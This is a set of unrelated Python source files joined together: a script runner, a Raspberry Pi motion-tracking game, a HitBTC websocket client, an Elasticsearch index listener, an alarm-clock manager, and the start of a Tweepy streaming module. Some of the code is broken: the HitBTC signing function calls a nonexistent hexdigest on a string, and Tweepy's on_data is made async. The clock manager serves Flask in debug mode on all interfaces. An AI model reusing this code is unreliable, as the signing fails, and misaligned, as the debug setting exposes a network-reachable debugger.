self.executeScript.setEnabled(False) self.scriptConsole.clear() self.textBrowser.clear() self.scriptName.setText("No Script Selected") def execute(self): import threading def execute_thread(): if script: repeat = self.repeatAmount.value() self.executeScript.setEnabled(False) global stop stop = False while repeat > 0: if stop: self.executeScript.setEnabled(False) break import time proc = subprocess.Popen( ["python", script], stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) output = proc.communicate()[0].decode("utf-8") self.scriptConsole.append(output) self.scriptConsole.moveCursor(QtGui.QTextCursor.End) QApplication.processEvents() repeat -= 1 if repeat != 0: time.sleep(self.delayAmount.value()) self.executeScript.setEnabled(True) x = threading.Thread(target=execute_thread) x.daemon = True x.start() def cancelexecute(self): global stop stop = True self.executeScript.setEnabled(True) if __name__ == "__main__": app = QApplication(sys.argv) window = AppWindow() sys.exit(app.exec_())
hotspot-game.py
#!/usr/bin/env python """ hotspot-game ver 0.8 written by Claude Pageau pageauc@gmail.com Raspberry (Pi) - python opencv2 motion tracking using picamera module This is a raspberry pi python opencv2 motion tracking demonstration game. It will detect motion in the field of view and return x and y coordinates of the most dominant contour. Keep your body still and move your hand to activate menu's and hit the hotspot box to score points. The High score is saved in a file. Some of this code is base on a YouTube tutorial by Kyle Hounslow using C here https://www.youtube.com/watch?v=X6rPdRZzgjg Here is my YouTube video demonstrating motion tracking using a Raspberry Pi B2 https://youtu.be/09JS7twPBsQ Requires a Raspberry Pi with a RPI camera module installed and configured dependencies sudo apt-get update sudo apt-get upgrade sudo apt-get install python-opencv python-picamera """ progname = "hotspot_game.py ver 0.8" print("%s using python2 and OpenCV2" % (progname)) print("Loading Please Wait ....") import os import time from picamera import PiCamera from picamera.array import PiRGBArray import cv2 import numpy as np from threading import Thread from random import randint # Display Settings window_on = True # Set to True displays opencv windows (GUI desktop reqd) WINDOW_BIGGER = 1.5 # resize multiplier if window_on=True then makes opencv window bigger debug = True # Set to False for no data display # Game Settings hi_score_path = "hotspot_hi_score" # Game Timers target_timer = 4 # seconds to show target rectangle on screen before moving it # Game Settings hotspot_skill = 150 # starting size of rectangle in pixels hotspot_max_levels = 10 # default=10 Number of game levels lasting hotspot_level_timer hotspot_level_timer = 10 # seconds of time on each level hotspot_min_size = int( hotspot_skill / 8 ) # Camera Settings CAMERA_WIDTH = 640 CAMERA_HEIGHT = 480 CAMERA_HFLIP = False CAMERA_VFLIP = True CAMERA_ROTATION = 0 CAMERA_FRAMERATE = 45 # Menu Settings MENU_COUNTER = 12 # number of motions inside menu for selection MENU_WIDTH = 200 MENU_HEIGHT = 75 MENU_LINE_WIDTH = 2 # Motion Tracking Settings THRESHOLD_SENSITIVITY = 25 BLUR_SIZE = 10 MIN_AREA = 600 # excludes all contours less than or equal to this Area CIRCLE_SIZE = 8 # diameter of circle to show motion location in window CIRCLE_LINE = 3 # thickness of line for circle FONT_SCALE = .5 # OpenCV window text font size scaling factor default=.5 (lower is smaller) LINE_THICKNESS = 2 # thickness of bounding line in pixels big_w = int(CAMERA_WIDTH * WINDOW_BIGGER) big_h = int(CAMERA_HEIGHT * WINDOW_BIGGER) #----------------------------------------------------------------------------------------------- class PiVideoStream: # Video Stream using Treading def __init__(self, resolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=CAMERA_FRAMERATE, rotation=0, hflip=False, vflip=False): # initialize the camera and stream self.camera = PiCamera() self.camera.resolution = resolution self.camera.rotation = rotation self.camera.framerate = framerate self.camera.hflip = hflip self.camera.vflip = vflip self.rawCapture = PiRGBArray(self.camera, size=resolution) self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True) # initialize the frame and the variable used to indicate # if the thread should be stopped self.frame = None self.stopped = False def start(self): # start the thread to read frames from the video stream t = Thread(target=self.update, args=()) t.daemon = True t.start() return self def update(self): # keep looping infinitely until the thread is stopped for f in self.stream: # grab the frame from the stream and clear the stream in # preparation for the next frame self.frame = f.array self.rawCapture.truncate(0) # if the thread indicator variable is set, stop the thread # and resource camera resources if self.stopped: self.stream.close() self.rawCapture.close() self.camera.close() return def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True #----------------------------------------------------------------------------------------------- def read_hiscore(hi_score_path, hi_score): if not os.path.exists(hi_score_path): open(hi_score_path, 'w').close() f = open(hi_score_path, 'w+') f.write(str(hi_score)) f.close() with open(hi_score_path, 'r') as f: hi_score = f.read() f.closed hi_score = int(hi_score) return hi_score #----------------------------------------------------------------------------------------------- def save_hiscore(hi_score_path, hi_score): if not os.path.exists(hi_score_path): open(hi_score_path, 'w').close() f = open(hi_score_path, 'w+') f.write(str(hi_score)) f.close() #----------------------------------------------------------------------------------------------- def check_for_hit(x,y): global hsx global hsy global hotspot_size got_hit = False # procedure for processing motion location data if ( x < hsx + hotspot_size and x > hsx - hotspot_size and y < hsy + hotspot_size and y > hsy - hotspot_size): got_hit = True return got_hit #----------------------------------------------------------------------------------------------- def hotspot_game(): print("Initializing Camera ....") # Setup video stream on a processor Thread for faster speed vs = PiVideoStream().start() vs.camera.rotation = CAMERA_ROTATION vs.camera.hflip = CAMERA_HFLIP vs.camera.vflip = CAMERA_VFLIP time.sleep(2.0) # Give Camera time to initialize # initialize Variables global hsx global hsy global hotspot_size level_timer = hotspot_level_timer hsx = randint(10, CAMERA_WIDTH - int(CAMERA_WIDTH/8)) hsy = randint(10, CAMERA_HEIGHT - int(CAMERA_HEIGHT/8)) target_start = time.time() level_start_time = time.time() hotspot_hiscore = 0 hotspot_hiscore = read_hiscore(hi_score_path, hotspot_hiscore) hotspot_size = hotspot_skill hotspot_score = 0 hotspot_level = 1 player = "PLAYER " # menu hitcounters player1_hitcount = 0 player2_hitcount = 0 play_hitcount = 0 quit_hitcount = 0 end_of_game = False motion_found = False found_hit = False ready_counter = 4 # Game Section indicators begingame = True readyplayer = False playgame = False endgame = False # Initialize first image as stream.array image2 = vs.read() grayimage1 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY) while not end_of_game: # initialize variables image2 = vs.read() # Initialize second image # Convert image to gray scale for start of motion tracking grayimage2 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY) # Get differences between the two greyed, blurred images differenceimage = cv2.absdiff(grayimage1, grayimage2) grayimage1 = grayimage2 # Update grayimage1 for next iteration differenceimage = cv2.blur(differenceimage,(BLUR_SIZE,BLUR_SIZE)) # Get threshold of difference image based on THRESHOLD_SENSITIVITY variable retval, thresholdimage = cv2.threshold(differenceimage,THRESHOLD_SENSITIVITY,255,cv2.THRESH_BINARY) # Get all the contours found in the thresholdimage contours, hierarchy = cv2.findContours(thresholdimage,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) total_contours = len(contours) if playgame: biggest_area = MIN_AREA else: biggest_area = 4000 motion_found = False cx = -1 cy = -1 cw = -1 ch = -1 found_area = 0 # find contour with biggest area for c in contours: # get area of next contour found_area = cv2.contourArea(c) # find the middle of largest bounding rectangle if found_area > biggest_area: motion_found = True biggest_area = found_area (x, y, w, h) = cv2.boundingRect(c) cx = x + w/2 # put circle in middle of width cy = y + h/2 # put circle closer to top cw = w ch = h if window_on: if begingame: # Pick Players # Display Player Choice Menu player1_x = int(CAMERA_WIDTH/6) player1_y = 200 cv2.rectangle(image2, (player1_x, player1_y), (player1_x+ MENU_WIDTH, player1_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAYER 1", ( player1_x + int(MENU_WIDTH/3), int( player1_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Display Quit Menu player2_x = player1_x + MENU_WIDTH + 20 player2_y = 200 cv2.rectangle(image2, (player2_x, player2_y), (player2_x+ MENU_WIDTH, player2_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAYER 2", ( player2_x + int(MENU_WIDTH/3), int( player2_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Player 1 Menu Box if (cx > player1_x and cx < player1_x + MENU_WIDTH and cy > player1_y and cy < player1_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) player1_hitcount += 1 player2_hitcount = 0 if player1_hitcount > MENU_COUNTER: player = "PLAYER 1" player1_hitcount = 0 player2_hitcount = 0 begingame = False endgame = False playgame = False readyplayer = True ready_counter = 4 # Player 2 Menu Box elif (cx > player2_x and cx < player2_x + MENU_WIDTH and cy > player2_y and cy < player2_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) player2_hitcount += 1 player1_hitcount = 0 if player2_hitcount > MENU_COUNTER: player = "PLAYER 2" player1_hitcount = 0 player2_hitcount = 0 begingame = False endgame = False playgame = False readyplayer = True ready_counter = 4 else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255, 0),CIRCLE_LINE) elif readyplayer: # Player Count Down to Start Playing ready_counter = ready_counter - 1 if ready_counter < 0: ready_counter = 4 readyplayer = False endgame = False playgame = True elif playgame: # Main Hotspot Game if time.time() - level_start_time > level_timer: level_start_time = time.time() if hotspot_level < hotspot_max_levels: hotspot_level += 1 else: hotspot_level = hotspot_max_levels begingame = False playgame = False endgame = True if hotspot_size < hotspot_min_size: hotspot_size = hotspot_min_size else: hotspot_size = hotspot_size - int(hotspot_skill/ hotspot_max_levels) if motion_found: found_hit = check_for_hit(cx,cy) # show small circle at motion location if found_hit: hotspot_score += 5 # Update Score cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) cv2.rectangle(image2,(hsx, hsy), (hsx + hotspot_size, hsy + hotspot_size), (0,0,255),LINE_THICKNESS +1) else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255,0),CIRCLE_LINE) cv2.rectangle(image2,(hsx, hsy), (hsx + hotspot_size, hsy + hotspot_size), (0,255,0),LINE_THICKNESS) # display a target square for hotspot game if selected target_diff = time.time() - target_start if target_diff > target_timer: hsx = randint(int(CAMERA_WIDTH/8), CAMERA_WIDTH - int(CAMERA_WIDTH/8)) hsy = randint(int(CAMERA_HEIGHT/8), CAMERA_HEIGHT - int(CAMERA_HEIGHT/8)) target_start = time.time() elif endgame: # Game result display and Play, Quit Menu # Game Over ask to play again. play_x = int(CAMERA_WIDTH/6) play_y = 200 if hotspot_score > hotspot_hiscore: m_text = "GAME OVER .. NEW HI SCORE %i" % ( hotspot_score ) save_hiscore(hi_score_path, hotspot_score) else: m_text = "GAME OVER .. YOUR SCORE %i" % ( hotspot_score ) cv2.putText(image2, m_text, ( play_x, int(CAMERA_HEIGHT/3)), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), 2) # Display Play and Quit Menu Choices # Play Again Menu Box cv2.rectangle(image2, (play_x, play_y), (play_x+ MENU_WIDTH, play_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "PLAY AGAIN ?", ( play_x + int(MENU_WIDTH/3), int( play_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Display Quit Menu Box quit_x = play_x + MENU_WIDTH + 20 quit_y = 200 cv2.rectangle(image2, (quit_x, quit_y), (quit_x+ MENU_WIDTH, quit_y+ MENU_HEIGHT), (0,255,0), MENU_LINE_WIDTH) cv2.putText(image2, "QUIT", ( quit_x + int(MENU_WIDTH/3), int( quit_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, FONT_SCALE , (0,255,0), MENU_LINE_WIDTH) # Play Again Menu Box if (cx > play_x and cx < play_x + MENU_WIDTH and cy > play_y and cy < play_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) play_hitcount += 1 quit_hitcount = 0 if play_hitcount > MENU_COUNTER: play_hitcount = 0 quit_hitcount = 0 hotspot_size = hotspot_skill if hotspot_score > hotspot_hiscore: hotspot_hiscore = hotspot_score hotspot_score = 0 hotspot_level = 1 end_of_game = False playgame = False endgame = False readyplayer = False begingame = True # Quit Menu Box elif (cx > quit_x and cx < quit_x + MENU_WIDTH and cy > quit_y and cy < quit_y + MENU_HEIGHT): cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,0,255),CIRCLE_LINE) quit_hitcount += 1 play_hitcount = 0 if quit_hitcount > MENU_COUNTER: playgame = False begingame = False end_of_game = True else: cv2.circle(image2,(cx,cy),CIRCLE_SIZE,(0,255, 0),CIRCLE_LINE) if readyplayer: # Display Player Count Down to Start New Game time.sleep(1.5) cv2.putText(image2, "READY " + player, ( 200, int( player2_y + MENU_HEIGHT/2)), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), MENU_LINE_WIDTH) cv2.putText(image2, str(ready_counter) , ( 300, int( player2_y + MENU_HEIGHT/2) + 40), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,0,255), MENU_LINE_WIDTH) else: # Display Game Information at top of Screen m_text = "%s SCORE %i LEVEL %i HI SCORE %i " % ( player, hotspot_score, hotspot_level, hotspot_hiscore) cv2.putText(image2, m_text, ( 2, 20), cv2.FONT_HERSHEY_SIMPLEX, .75 , (0,255,0), 2) if WINDOW_BIGGER > 1: # resize motion window to desired size image2 = cv2.resize(image2, (big_w, big_h)) cv2.imshow('HOTSPOT GAME q in Window to Quit', image2) # bigger size else: # display original image size motion window cv2.imshow('HOTSPOT BAME q in Window to Quit', image2) # original size # cv2.imshow('Threshold Image', thresholdimage) # cv2.imshow('Difference Image',differenceimage if cv2.waitKey(1) & 0xFF == ord('q'): # Close Window if q pressed cv2.destroyAllWindows() print("") print("ctrl-q pressed End %s" % (progname)) vs.stop() end_of_game = True if debug: if motion_found: print("total_Contours=%2i Motion at cx=%3i cy=%3i Area:%3ix%3i=%5i" % (total_contours, cx ,cy, cw, ch, cw*ch)) #----------------------------------------------------------------------------------------------- if __name__ == '__main__': try: hotspot_game() finally: print("") print("+++++++++++++++++++++++++++++++++++") print("%s - Exiting Program" % progname) print("+++++++++++++++++++++++++++++++++++") print("")
hitbtc.py
#import Built-Ins import logging from threading import Thread from queue import Queue, Empty import json import time import hmac import hashlib # Import Third-Party from websocket import create_connection, WebSocketTimeoutException # Import Homebrew from .base import WSSAPI # Init Logging Facilities log = logging.getLogger(__name__) class HitBTCWSS(WSSAPI): def __init__(self, key=None, secret=None): data_addr = 'ws://api.hitbtc.com:80' super(HitBTCWSS, self).__init__(data_addr, 'HitBTC') self.trader_addr = 'ws://api.hitbtc.com:8080' self.data_thread = None self.supervisor_thread = None self.trade_thread = None self.key = key self.secret = secret self.trade_command_q = Queue() def start(self, duplex=False): super(HitBTCWSS, self).start() if duplex: self.trade_thread = Thread(target=self._trade_thread, name='Trader Thread') self.trade_thread.daemon = True self.trade_thread.start() self.data_thread = Thread(target=self._data_thread, name='Data Thread') self.data_thread.daemon = True self.data_thread.start() def stop(self): super(HitBTCWSS, self).stop() self.data_thread.join() if self.trade_thread: self.trade_thread.join() def eval_command(self, cmd): if cmd == 'restart_data': self.data_thread.join() self.data_thread = Thread(target=self._data_thread, name='Data Thread') self.data_thread.start() def _data_thread(self): try: conn = create_connection(self.addr,http_proxy_host='127.0.0.1', http_proxy_port=1087) except Exception as e: self._controller_q.put('restart_data') return while self.running: try: data = conn.recv() data = json.loads(data) except WebSocketTimeoutException: self._controller_q.put('restart_data') return try: pair = data['MarketDataIncrementalRefresh']['symbol'] endpoint = 'MarketDataIncrementalRefresh' except KeyError: pair = data['MarketDataSnapshotFullRefresh']['symbol'] endpoint = 'MarketDataSnapshotFullRefresh' self.data_q.put((endpoint, pair, data[endpoint], time.time())) def _trade_thread(self): try: conn = create_connection(self.trader_addr) except Exception: log.exception('Trader Thread Error!') self._controller_q.put('restart_trader') return while self.running: try: data = conn.recv() except WebSocketTimeoutException: self._controller_q.put('restart_data') return self.data_q.put(json.loads(data)) try: payload = self.trade_command_q.get() except Empty: continue try: conn.send(self.sign(payload)) except (WebSocketTimeoutException, ConnectionResetError): continue def sign(self, payload): """ Signature method which wraps signature and nonce parameters around a payload dictionary. :param payload: :return: """ nonce = str(int(time.time() * 1000)) package = {'apikey': self.key, 'message': {'nonce': nonce, 'payload': payload}} signature = hmac.new(self.secret, json.dumps(payload).hexdigest, hashlib.sha512).hexdigest() package['signature'] = signature return json.dumps(package) def send(self, payload, auth=False): pkg = self.sign(payload) if auth else payload self.trade_command_q.put(pkg)
es_index_listener.py
"""\ Example. %(prog)s production.ini """ from webtest import TestApp from snovault import STORAGE from snovault.elasticsearch import ELASTIC_SEARCH import atexit import datetime import elasticsearch.exceptions import json import logging import os import psycopg2 import select import signal import socket import sqlalchemy.exc import sys import threading import time from urllib.parse import parse_qsl log = logging.getLogger(__name__) EPILOG = __doc__ DEFAULT_TIMEOUT = 60 PY2 = sys.version_info[0] == 2 # We need this because of MVCC visibility. # See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf # https://devcenter.heroku.com/articles/postgresql-concurrency def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, path='/index', control=None, update_status=None): assert update_status is not None timestamp = datetime.datetime.now().isoformat() update_status( status='connecting', timestamp=timestamp, timeout=timeout, ) # Make sure elasticsearch is up before trying to index. if path == '/index_file': es = testapp.app.registry['snp_search'] else: es = testapp.app.registry[ELASTIC_SEARCH] # Wait until cluster comes up es.cluster.health(wait_for_status='yellow', request_timeout=60) es.info() log.info('es_index_listener given path: ' + path) max_xid = 0 DBSession = testapp.app.registry[STORAGE].write.DBSession engine = DBSession.bind # DBSession.bind is configured by app init # noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine connection = engine.pool.unique_connection() try: connection.detach() conn = connection.connection conn.autocommit = True conn.set_session(readonly=True) sockets = [conn] if control is not None: sockets.append(control) recovery = None listening = False with conn.cursor() as cursor: while True: if not listening: # cannot execute LISTEN during recovery cursor.execute("""SELECT pg_is_in_recovery();""") recovery, = cursor.fetchone() if not recovery: # http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications cursor.execute("""LISTEN "snovault.transaction";""") log.debug("Listener connected") listening = True cursor.execute("""SELECT txid_current_snapshot();""") snapshot, = cursor.fetchone() timestamp = datetime.datetime.now().isoformat() update_status( listening=listening, recovery=recovery, snapshot=snapshot, status='indexing', timestamp=timestamp, max_xid=max_xid, ) try: res = testapp.post_json(path, { 'record': True, 'dry_run': dry_run, 'recovery': recovery, }) except Exception as e: timestamp = datetime.datetime.now().isoformat() log.exception('index failed at max xid: %d', max_xid) update_status(error={ 'error': repr(e), 'max_xid': max_xid, 'timestamp': timestamp, }) else: timestamp = datetime.datetime.now().isoformat() result = res.json result['stats'] = { k: int(v) for k, v in parse_qsl( res.headers.get('X-Stats', '')) } result['timestamp'] = timestamp update_status(last_result=result) if result.get('indexed', 0): update_status(result=result) log.info(result) update_status( status='waiting', timestamp=timestamp, max_xid=max_xid, ) # Wait on notifcation readable, writable, err = select.select(sockets, [], sockets, timeout) if err: raise Exception('Socket error') if control in readable: command = control.recv(1) log.debug('received command: %r', command) if not command: # Other end shutdown return if conn in readable: conn.poll() while conn.notifies: notify = conn.notifies.pop() xid = int(notify.payload) max_xid = max(max_xid, xid) log.debug('NOTIFY %s, %s', notify.channel, notify.payload) finally: connection.close() class ErrorHandlingThread(threading.Thread): if PY2: @property def _kwargs(self): return self._Thread__kwargs @property def _args(self): return self._Thread__args @property def _target(self): return self._Thread__target def run(self): timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT) update_status = self._kwargs['update_status'] control = self._kwargs['control'] while True: try: self._target(*self._args, **self._kwargs) except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError, elasticsearch.exceptions.ConnectionError) as e: # Handle database restart log.warning('Database not there, maybe starting up: %r', e) timestamp = datetime.datetime.now().isoformat() update_status( timestamp=timestamp, status='sleeping', error={'error': repr(e), 'timestamp': timestamp}, ) readable, _, _ = select.select([control], [], [], timeout) if control in readable: command = control.recv(1) log.debug('received command: %r', command) if not command: # Other end shutdown return log.debug('sleeping') time.sleep(timeout) continue except Exception: # Unfortunately mod_wsgi does not restart immediately log.exception('Exception in listener, restarting process at next request.') os.kill(os.getpid(), signal.SIGINT) break def composite(loader, global_conf, **settings): listener = None # Register before testapp creation. @atexit.register def join_listener(): if listener: log.debug('joining listening thread') listener.join() path = settings.get('path', '/index') # Composite app is used so we can load the main app app_name = settings.get('app', None) app = loader.get_app(app_name, global_conf=global_conf) username = settings.get('username', 'IMPORT') environ = { 'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': username, } testapp = TestApp(app, environ) # Use sockets to integrate with select controller, control = socket.socketpair() timestamp = datetime.datetime.now().isoformat() status_holder = { 'status': { 'status': 'starting listener', 'started': timestamp, 'errors': [], 'results': [], }, } def update_status(error=None, result=None, indexed=None, **kw): # Setting a value in a dictionary is atomic status = status_holder['status'].copy() status.update(**kw) if error is not None: status['errors'] = [error] + status['errors'][:2] if result is not None: status['results'] = [result] + status['results'][:9] status_holder['status'] = status kwargs = { 'testapp': testapp, 'control': control, 'update_status': update_status, 'path': path, } if 'timeout' in settings: kwargs['timeout'] = float(settings['timeout']) listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs) listener.daemon = True log.debug('starting listener') listener.start() # Register before testapp creation. @atexit.register def shutdown_listener(): log.debug('shutting down listening thread') control # Prevent early gc controller.shutdown(socket.SHUT_RDWR) def status_app(environ, start_response): status = '200 OK' response_headers = [('Content-type', 'application/json')] start_response(status, response_headers) return [json.dumps(status_holder['status'])] return status_app def internal_app(configfile, app_name=None, username=None): from webtest import TestApp from pyramid import paster app = paster.get_app(configfile, app_name) if not username: username = 'IMPORT' environ = { 'HTTP_ACCEPT': 'application/json', 'REMOTE_USER': username, } return TestApp(app, environ) def main(): import argparse parser = argparse.ArgumentParser( description="Listen for changes from postgres and index in elasticsearch", epilog=EPILOG, formatter_class=argparse.RawDescriptionHelpFormatter, ) parser.add_argument('--app-name', help="Pyramid app name in configfile") parser.add_argument( '--username', '-u', default='INDEXER', help="Import username") parser.add_argument( '--dry-run', action='store_true', help="Don't post to ES, just print") parser.add_argument( '-v', '--verbose', action='store_true', help="Print debug level logging") parser.add_argument( '--poll-interval', type=int, default=DEFAULT_TIMEOUT, help="Poll interval between notifications") parser.add_argument( '--path', default='/index', help="Path of indexing view (/index or /index_file)") parser.add_argument('config_uri', help="path to configfile") args = parser.parse_args() logging.basicConfig() testapp = internal_app(args.config_uri, args.app_name, args.username) # Loading app will have configured from config file. Reconfigure here: if args.verbose or args.dry_run: logging.getLogger('snovault').setLevel(logging.DEBUG) return run(testapp, args.poll_interval, args.dry_run, args.path) if __name__ == '__main__': main()
clockmanager.py
import alarmclock.clock as AlarmClock import sys import getopt import unittest import clockconfig import utils.log as log import multiprocessing from multiprocessing import Queue from threading import Timer from gui import app import messages def execute_system_test(logger): """ Execute the system test """ logger.info('Executing System Test') suite = unittest.TestSuite() testmodules = [ 'utils.tests', 'sound.tests' ] for t in testmodules: suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t)) if unittest.TextTestRunner(verbosity=2).run(suite): logger.info("System Test Passed Successfully") else: logger.error("System Test Failed") sys.exit() def is_system_test(): try: opts, args = getopt.getopt(sys.argv[1:],"t") except getopt.GetoptError: print 'clockmanager.py -t (optionnal)' sys.exit(2) for opt, arg in opts: if opt == '-t': return True return False def start_clock_process(commands_from_user, clock_started_event, clock_play_state, playlist): p = multiprocessing.Process(target=AlarmClock.process, kwargs={'commands_from_user': commands_from_user, 'clock_started_event': clock_started_event, 'clock_play_state': clock_play_state, 'playlist': playlist}) p.start() return p def monitor(): """ Monitor System Health and Process State #TODO :return: """ print 'monitor' start_monitor_thread() def start_monitor_thread(): """ Monitor System Health and Process State #TODO :return: """ Timer(clockconfig.monitor_period_in_s, monitor).start() def start_user_interface_process(): """ Start the user interface process """ p = multiprocessing.Process(target=app.run(debug=True, use_reloader=False, host='0.0.0.0'), name='gui') p.start() def create_processes_shared_ressources(): app.cmdsToClock = Queue() clock_started = multiprocessing.Event() app.currentPlayState = multiprocessing.Manager().dict({'status': 'idle', 'track': None}) app.playlist = multiprocessing.Manager().list() return (app.cmdsToClock, clock_started, app.currentPlayState, app.playlist) if __name__ == '__main__': logger = log.create_logger() if is_system_test(): execute_system_test(logger) else: ui_to_clock_cmds, clock_started, clock_play_state, playlist = create_processes_shared_ressources() start_clock_process(commands_from_user=ui_to_clock_cmds, clock_started_event=clock_started, clock_play_state=clock_play_state, playlist=playlist) clock_started.wait(10) if not clock_started.is_set(): logger.error("Clock did not start") else: logger.info("Clock process started") start_user_interface_process() logger.info("User Interface Started") start_monitor_thread()
streaming.py
# Tweepy # Copyright 2009-2020 Joshua Roesslein # See LICENSE for details. # Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets from __future__ import absolute_import import json import logging import re import requests import ssl import sys from threading import Thread from time import sleep import six from requests.exceptions import Timeout from tweepy.api import API from tweepy.error import TweepError from tweepy.models import Status STREAM_VERSION = '1.1' log = logging.getLogger(__name__) class StreamListener(object): def __init__(self, api=None): self.api = api or API() def on_connect(self): """Called once connected to streaming server. This will be invoked once a successful response is received from the server. Allows the listener to perform some work prior to entering the read loop. """ pass async def on_data(self, raw_data): """Called when raw data is received from connection. Override this method if you wish to manually handle the stream data. Return False to stop stream and close connection. """ data = json.loads(raw_data) if 'in_reply_to_status_id' in data: status = Status.parse(self.api, data) if self.on_status(status) is False: return False elif 'delete' in data: delete = data['delete']['status'] if self.on_delete(delete['id'], delete['user_id']) is False: return False elif 'event' in data: status = Status.parse(self.api, data) if self.on_event(status) is False: return False elif 'direct_message' in data: status = Status.parse(self.api, data) if self.on_direct_message(status) is False: return False elif 'friends' in data: if self.on_friends(data['friends']) is False: return False elif 'limit' in data: if self.on_limit(data['limit']['track']) is False: return False elif 'disconnect' in data: if self.on_disconnect(data['disconnect']) is False: return False elif 'warning' in data: if self.on_warning(data['warning']) is False: return False elif 'scrub_geo' in data: if self.on_scrub_geo(data['scrub_geo']) is False: return False elif 'status_withheld' in data: if self.on_status_withheld(data['status_withheld']) is False: return False elif 'user_withheld' in data: if self.on_user_withheld(data['user_withheld']) is False: return False else: log.error("Unknown message type: %s", raw_data) def keep_alive(self): """Called when a keep-alive arrived""" return def on_status(self, status): """Called when a new status arrives""" return def on_exception(self, exception): """Called when an unhandled exception occurs.""" return def on_delete(self, status_id, user_id): """Called when a delete notice arrives for a status""" return def on_event(self, status): """Called when a new event arrives""" return def on_direct_message(self, status): """Called when a new direct message arrives""" return def on_friends(self, friends): """Called when a friends list arrives. friends is a list that contains user_id """ return def on_limit(self, track): """Called when a limitation notice arrives""" return def on_error(self, status_code): """Called when a non-200 status code is returned""" return False def on_timeout(self): """Called when stream connection times out""" return def on_disconnect(self, notice): """Called when twitter sends a disconnect notice Disconnect codes are listed here: https://developer.twitter.com/en/docs/tweets/filter-realtime/guides/streaming-message-types """ return def on_warning(self, notice): """Called when a disconnection warning message arrives""" return def on_scrub_geo(self, notice): """Called when a location deletion notice arrives""" return def on_status_withheld(self, notice): """Called when a status withheld content notice arrives""" return def on_user_withheld(self, notice): """Called when a user withheld content notice arrives""" return class ReadBuffer(object): """Buffer data from the response in a smarter way than httplib/requests can. Tweets are roughly in the 2-12kb range, averaging around 3kb. Requests/urllib3/httplib/socket all use socket.read, which blocks until enough data is returned. On some systems (eg google appengine), socket reads are quite slow. To combat this latency we can read big chunks, but the blocking part means we won't get results until enough tweets have arrived. That may not be a big deal for high throughput systems. For low throughput systems we don't want to sacrifice latency, so we use small chunks so it can read the length and the tweet in 2 read calls. """ def __init__(self, stream, chunk_size, encoding='utf-8'): self._stream = stream self._buffer = six.b('') self._chunk_size = chunk_size self._encoding = encoding def read_len(self, length): while not self._stream.closed: if len(self._buffer) >= length: return self._pop(length) read_len = max(self._chunk_size, length - len(self._buffer)) self._buffer += self._stream.read(read_len) return six.b('') def read_line(self, sep=six.b('\n')): """Read the data stream until a given separator is found (default \n) :param sep: Separator to read until. Must by of the bytes type (str in python 2, bytes in python 3) :return: The str of the data read until sep """ start = 0 while not self._stream.closed: loc = self._buffer.find(sep, start) if loc >= 0: return self._pop(loc + len(sep)) else: start = len(self._buffer) self._buffer += self._stream.read(self._chunk_size) return six.b('') def _pop(self, length): r = self._buffer[:length] self._buffer = self._buffer[length:] return r.decode(self._encoding) class Stream(object): def __init__(self, auth, listener, **options): self.auth = auth self.listener = listener self.running = False self.daemon = options.get("daemon", False) self.timeout = options.get("timeout", 300.0) self.retry_count = options.get("retry_count") # values according to # https://developer.twitter.com/en/docs/tweets/filter-realtime/guides/connecting#reconnecting self.retry_time_start = options.get("retry_time", 5.0) self.retry_420_start = options.get("retry_420", 60.0) self.retry_time_cap = options.get("retry_time_cap", 320.0) self.snooze_time_step = options.get("snooze_time", 0.25) self.snooze_time_cap = options.get("snooze_time_cap", 16) # The default socket.read size. Default to less than half the size of # a tweet so that it reads tweets with the minimal latency of 2 reads # per tweet. Values higher than ~1kb will increase latency by waiting # for more data to arrive but may also increase throughput by doing # fewer socket read calls. self.chunk_size = options.get("chunk_size", 512) self.verify = options.get("verify", True) self.api = API() self.headers = options.get("headers") or {} self.new_session() self.body = None self.retry_time = self.retry_time_start self.snooze_time = self.snooze_time_step # Example: proxies = {'http': 'http://localhost:1080', 'https': 'http://localhost:1080'} self.proxies = options.get("proxies") self.host = options.get('host', 'stream.twitter.com') def new_session(self): self.session = requests.Session() self.session.headers = self.headers 